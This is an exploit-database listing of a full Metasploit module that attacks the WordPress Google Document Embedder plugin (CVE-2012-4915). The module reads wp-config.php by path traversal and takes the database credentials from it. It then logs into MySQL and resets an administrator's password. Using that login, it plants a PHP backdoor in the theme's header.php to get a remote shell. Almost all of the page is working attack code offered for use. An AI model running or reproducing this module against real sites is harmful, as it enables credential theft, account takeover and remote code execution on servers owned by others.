WordPress Google Document Embedder Arbitrary File Disclosure



EKU-ID: 2942 CVE: 2012-4915 OSVDB-ID: 88891
Author: Charlie Eriksen Published: 2013-01-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rbmysql'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::Report

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WordPress Plugin Google Document Embedder Arbitrary File Disclosure',
			'Description'    => %q{
					This module exploits an arbitrary file disclosure flaw in the WordPress
				blogging software plugin known as Google Document Embedder. The vulnerability allows for
				database credential disclosure via the /libs/pdf.php script. The Google Document Embedder
				plug-in versions 2.4.6 and below are vulnerable. This exploit only works when the MySQL
				server is exposed on a accessible IP and Wordpress has filesystem write access.

				Please note: The admin password may get changed if the exploit does not run to the end.
			},
			'Author'         =>
				[
					'Charlie Eriksen',
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['CVE', '2012-4915'],
					['OSVDB', '88891'],
					['URL', 'http://secunia.com/advisories/50832'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Jan 03 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']),
				OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']),
				OptString.new('ADMINPATH', [true, 'The relative path to the admin folder', 'wp-admin/']),
				OptString.new('THEMESPATH', [true, 'The relative path to the admin folder', 'wp-content/themes/'])
			], self.class)
	end

	def check
		uri = target_uri.path
		uri << '/' if uri[-1,1] != '/'
		plugins_uri = String.new(uri)
		plugins_uri << datastore['PLUGINSPATH']
		plugins_uri << '/' if plugins_uri[-1,1] != '/'

		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => "#{plugins_uri}google-document-embedder/libs/pdf.php",
		})

		if res and res.code == 200
			return Exploit::CheckCode::Detected
		else
			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		uri = target_uri.path
		uri << '/' if uri[-1,1] != '/'
		plugins_uri = String.new(uri)
		plugins_uri << datastore['PLUGINSPATH']
		plugins_uri << '/' if plugins_uri[-1,1] != '/'
		admin_uri = String.new(uri)
		admin_uri << datastore['ADMINPATH']
		admin_uri << '/' if plugins_uri[-1,1] != '/'
		themes_uri = String.new(uri)
		themes_uri << datastore['THEMESPATH']
		themes_uri << '/' if plugins_uri[-1,1] != '/'

		print_status('Fetching wp-config.php')
		res = send_request_cgi({
			'method'     => 'GET',
			'uri'        => "#{plugins_uri}google-document-embedder/libs/pdf.php",
			'vars_get'   =>
				{
					'fn'   => "#{rand_text_alphanumeric(4)}.pdf",
					'file' => "#{'../' * plugins_uri.count('/')}wp-config.php",
				}
		})

		if res and res.body =~ /allow_url_fopen/
			fail_with(Exploit::Failure::NotVulnerable, 'allow_url_fopen and curl are both disabled')
		elsif res.code != 200
			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
		end

		config = parse_wp_config(res.body)
		if not ['DB_HOST', 'DB_PORT', 'DB_USER', 'DB_PASSWORD', 'DB_NAME'].all? { |parameter| config.has_key?(parameter) }
			fail_with(Exploit::Failure::UnexpectedReply, "The config file did not parse properly")
		end
		begin
			@mysql_handle = ::RbMysql.connect({
				:host           => config['DB_HOST'],
				:port           => config['DB_PORT'],
				:read_timeout   => 300,
				:write_timeout  => 300,
				:socket         => nil,
				:user           => config['DB_USER'],
				:password       => config['DB_PASSWORD'],
				:db             => config['DB_NAME']
			})
		rescue Errno::ECONNREFUSED,
			RbMysql::ClientError,
			Errno::ETIMEDOUT,
			RbMysql::AccessDeniedError,
			RbMysql::HostNotPrivileged
			fail_with(Exploit::Failure::NotVulnerable, 'Unable to connect to the MySQL server')
		end
		res = @mysql_handle.query("SELECT user_login, user_pass FROM #{config['DB_PREFIX']}users U
									INNER JOIN #{config['DB_PREFIX']}usermeta M ON M.user_id = U.ID AND M.meta_key = 'wp_user_level' AND meta_value = '10' LIMIT 1")

		if res.nil? or res.size <= 0
			fail_with(Exploit::Failure::UnexpectedReply, 'No admin was account found')
		end

		user = res.first

		new_password = rand_text_alphanumeric(8)
		@mysql_handle.query("UPDATE #{config['DB_PREFIX']}users SET user_pass = '#{::Rex::Text.md5(new_password)}' WHERE user_login = '#{user[0]}'")
		print_warning("Admin password changed to: #{new_password}")

		admin_cookie = get_wp_cookie(uri, user[0], new_password)

		theme, nonce, old_content = get_wp_theme(admin_uri, admin_cookie)

		print_warning("Editing theme #{theme}")
		set_wp_theme(admin_uri, admin_cookie, nonce, theme, payload.encoded)

		print_status("Calling backdoor")
		res = send_request_cgi({
			'method' => 'GET',
			'uri'    => "#{themes_uri}#{theme}/header.php",
		})

		if res and res.code != 200
			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
		end

		set_wp_theme(admin_uri, admin_cookie, nonce, theme, old_content)

		@mysql_handle.query("UPDATE #{config['DB_PREFIX']}users SET user_pass = '#{user[1]}' WHERE user_login = '#{user[0]}'")

		print_status("Shell should have been acquired. Disabled backdoor")
	end

	def parse_wp_config(body)
		p = store_loot('wordpress.config', 'text/plain', rhost, body, "#{rhost}_wp-config.php")
		print_status("wp-config.php saved in: #{p}")
		print_status("Parsing config file")
		values = {}

		body.each_line do |line|
			if line =~ /define/
				key_pair = line.scan(/('|")([^'"]*)('|")/)
				if key_pair.length == 2
					values[key_pair[0][1]] = key_pair[1][1]
				end
			elsif line =~ /table_prefix/
				table_prefix = line.scan(/('|")([^'"]*)('|")/)
				values['DB_PREFIX'] = table_prefix[0][1]
			end
		end
		#Extract the port from DB_HOST and normalize DB_HOST
		values['DB_PORT'] = values['DB_HOST'].include?(':') ? values['DB_HOST'].split(':')[1] : 3306

		if values['DB_HOST'] =~ /(localhost|127.0.0.1)/
			print_status("DB_HOST config value was a loopback address. Trying to resolve to a proper IP")
			values['DB_HOST'] = ::Rex::Socket.getaddress(datastore['RHOST'])
		end

		return values
	end

	def get_wp_cookie(uri, username, password)
		res = send_request_cgi({
			'method'     => 'POST',
			'uri'        => "#{uri}wp-login.php",
			'cookie'     => 'wordpress_test_cookie=WP+Cookie+check',
			'vars_post'  =>
				{
					'log'        => username,
					'pwd'        => password,
					'wp-submit'  => 'Log+In',
					'testcookie' => '1',
				},
		})

		if res and res.code == 200
			fail_with(Exploit::Failure::UnexpectedReply, 'Admin login failed')
		elsif res and res.code != 302
			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
		end

		admin_cookie = ''
		(res.headers['Set-Cookie'] || '').split(',').each do |cookie|
			admin_cookie << cookie.split(';')[0]
			admin_cookie << ';'
		end

		if admin_cookie.empty?
			fail_with(Exploit::Failure::UnexpectedReply, 'The resulting cookie was empty')
		end

		return admin_cookie
	end

	def get_wp_theme(admin_uri, admin_cookie)
		res = send_request_cgi({
			'method' => 'POST',
			'uri'    => "#{admin_uri}theme-editor.php?file=header.php",
			'cookie' => admin_cookie,
		})

		if res and res.code != 200
			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
		elsif res and res.body.scan(/<input.+?name="submit".+?class="button button-primary"/).length == 0
			fail_with(Exploit::Failure::NotVulnerable, 'Wordpress does not have write access')
		end

		nonce = res.body.scan(/<input.+?id="_wpnonce".+?value="(.+?)"/)[0][0].to_s
		old_content = Rex::Text.html_decode(Rex::Text.html_decode(res.body.scan(/<textarea.+?id="newcontent".+?>(.*)<\/textarea>/m)[0][0].to_s))
		theme = res.body.scan(/<input.+?name="theme".+?value="(.+?)"/)[0][0].to_s

		return [theme, nonce, old_content]
	end

	def set_wp_theme(admin_uri, admin_cookie, nonce, theme, new_content)
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => "#{admin_uri}theme-editor.php?",
			'cookie'    => admin_cookie,
			'vars_post' =>
				{
					'_wpnonce'   => nonce,
					'theme'      => theme,
					'newcontent' => new_content,
					'action'     => 'update',
					'file'       => 'header.php'
				},
		})

		if res and res.code != 302
			fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}")
		end
	end

end